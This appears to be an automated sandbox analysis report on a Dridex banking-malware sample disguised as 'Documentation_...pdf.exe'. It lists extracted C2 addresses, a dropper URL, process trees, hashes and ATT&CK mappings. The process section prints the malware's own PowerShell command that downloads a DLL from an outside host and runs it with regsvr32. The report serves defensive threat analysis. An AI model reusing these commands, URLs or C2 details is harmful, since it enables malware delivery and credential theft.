dridex | c2016951e9a42f4d1edb3a844555d80b556cf933e72d86edee71640300fb389e

General

Target

Documentation_N00467290036012021.pdf.exe

Score

10^/10

dridex 10555 botnet loader ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://pecas24.mypart.pt/l0sjk3o.dll

Extracted

Family

dridex

Botnet

10555

C2

77.220.64.37:443

80.86.91.27:3308

5.100.228.233:3389

46.105.131.65:1512

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex

Dridex Loader 1 IoCs

Detects Dridex both x86 and x64 loader in memory.

botnet loader

Processes:

resource	yara_rule
behavioral1/memory/816-33-0x0000000000300000-0x000000000033D000-memory.dmp	dridex_ldr

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1848 powershell.exe
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

816 regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

740 PING.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1848 powershell.exe
1848 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1848 powershell.exe

flow	pid	process
5	1848	powershell.exe

pid	process
816	regsvr32.exe

pid	process
740	PING.EXE

pid	process
1848	powershell.exe
1848	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1848	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

Documentation_N00467290036012021.pdf.execmd.exe

description	pid	process	target process
PID 1068 wrote to memory of 1676	1068	Documentation_N00467290036012021.pdf.exe	cmd.exe
PID 1068 wrote to memory of 1676	1068	Documentation_N00467290036012021.pdf.exe	cmd.exe
PID 1068 wrote to memory of 1676	1068	Documentation_N00467290036012021.pdf.exe	cmd.exe
PID 1068 wrote to memory of 1676	1068	Documentation_N00467290036012021.pdf.exe	cmd.exe
PID 1676 wrote to memory of 740	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 740	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 740	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 740	1676	cmd.exe	PING.EXE
PID 1676 wrote to memory of 1848	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1848	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1848	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 1848	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe
PID 1676 wrote to memory of 816	1676	cmd.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\appdata\8tttqwre8ttde8gbhsad\DVP.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\PING.EXE
ping certificaton.comö¥ÿï¥««¢⌐ª¼ôÅñÅ₧íúÄÉ«¡»ƒêï£Ö₧ñ£àÅƒÄäûîÜôÖÉºîèúöì»êü¡áÄùÆìéñëèîïÑóÆîáÉó¿Æ░¥ñëââóÖí₧«ïÖö«ò¥òùôöë¿úôùô½ÖÖÆ½åîÑçê¬Ñª£Ñàç¿û¼î¡üªâÿí«
3⤵
- Runs ping.exe
PID:740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('http://pecas24.mypart.pt/l0sjk3o.dll','C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll');
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -s g7t5jgtz.dll
3⤵
- Loads dropped DLL
PID:816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll
MD5
68183c1d9929e5502729e95454eca8e0

SHA1
cfd4c7413fa9216afef60201895c3a620ea6801c

SHA256
9e39f4494952dfedc6608ebad6c832474045bfaba3ccbb69f8194a2681311eac

SHA512
98fa8564b0da7d8286819e1bf174ec84b4dc922f327e1397db8b08d5ab61637da39a79d0bf66f793e1381ca83de896c130bc03a45181bc4af237a5295ca738e7

Download Submit
C:\appdata\8tttqwre8ttde8gbhsad\DVP.bat
MD5
81d658043ac19d8986499c186989b544

SHA1
6ee49ab2e93ca3768cb9e82a821232b2114fd1d7

SHA256
dca939a8caadd5061a857b7d16e3620e5276e04d64389cf5b8ac6cf50b476c6a

SHA512
74349e48e27d380e65ab646e09aa2d05c3cc6960dee0678cc319bf0c3d0f6406157cb45fe35c8f885aa59d060c5355bfacb6b9a1752bd67b13c455ecc2d9d042

Download Submit
\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll
MD5
68183c1d9929e5502729e95454eca8e0

SHA1
cfd4c7413fa9216afef60201895c3a620ea6801c

SHA256
9e39f4494952dfedc6608ebad6c832474045bfaba3ccbb69f8194a2681311eac

SHA512
98fa8564b0da7d8286819e1bf174ec84b4dc922f327e1397db8b08d5ab61637da39a79d0bf66f793e1381ca83de896c130bc03a45181bc4af237a5295ca738e7

Download Submit
memory/740-6-0x0000000000000000-mapping.dmp

Download
memory/816-30-0x0000000000000000-mapping.dmp

Download
memory/816-33-0x0000000000300000-0x000000000033D000-memory.dmp

Filesize
244KB

Download
memory/952-34-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp

Filesize
2.5MB

Download
memory/1068-2-0x00000000035C0000-0x00000000035C1000-memory.dmp

Filesize
4KB

Download
memory/1676-4-0x0000000000000000-mapping.dmp

Download
memory/1848-8-0x0000000074880000-0x0000000074F6E000-memory.dmp

Filesize
6.9MB

Download
memory/1848-15-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/1848-20-0x00000000060B0000-0x00000000060B1000-memory.dmp

Filesize
4KB

Download
memory/1848-21-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/1848-28-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1848-29-0x00000000062A0000-0x00000000062A1000-memory.dmp

Filesize
4KB

Download
memory/1848-12-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/1848-11-0x0000000002130000-0x0000000002131000-memory.dmp

Filesize
4KB

Download
memory/1848-10-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/1848-9-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/1848-7-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads